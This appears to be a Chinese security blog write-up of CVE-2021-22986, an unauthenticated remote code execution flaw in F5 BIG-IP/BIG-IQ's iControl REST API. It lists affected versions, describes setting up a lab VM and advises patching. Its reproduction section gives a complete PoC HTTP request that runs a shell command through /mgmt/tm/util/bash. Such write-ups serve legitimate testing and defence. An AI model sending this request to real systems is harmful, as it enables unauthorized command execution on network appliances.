CVE-2021-22986：BIG-IP/BIG-IQ未授权RCE

文章来源：Timeline Sec

0x01 简介

F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

0x02 漏洞概述

编号：CVE-2021-22986

F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中，未经身份验证的攻击者可通过iControl REST接口，构造恶意请求，执行任意系统命令。

0x03 影响版本

F5 BIG-IP 16.0.0-16.0.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 6.0.0-6.1.0

0x04 环境搭建

流程如下：

1、登陆F5官网申请测试license 90天

https://www.f5.com/trials

2、按流程注册登陆后获得license，会发送至注册邮箱

3、下载漏洞版本镜像

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

4、下载后使用Vmware安装即可

0x05 漏洞复现

数据包如下，其中

Authorization: Basic YWRtaW46QVNhc1M=base64解码值为admin:ASasS需要注意此处X-F5-Auth-Token值为空

POC:

POST/mgmt/tm/util/bashHTTP/1.1Host: your_ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Connection: closeUpgrade-Insecure-Requests: 1Content-Length: 41{"command":"run","utilCmdArgs":"-c id"}

0x06 修复方式

1、建议将F5 BIG-IP / BIG-IQ 升级至安全版本。

下载地址参考：

https://support.f5.com/csp/article/K02566623

2、建议利用阿里云安全组功能为 F5 BIG-IP / BIG-IQ 相关管理界面设置白名单，仅对可信地址开放访问。

参考链接：

http://www.jsdjbh.gov.cn/tgyj/746.htm

https://www.freebuf.com/vuls/266899.html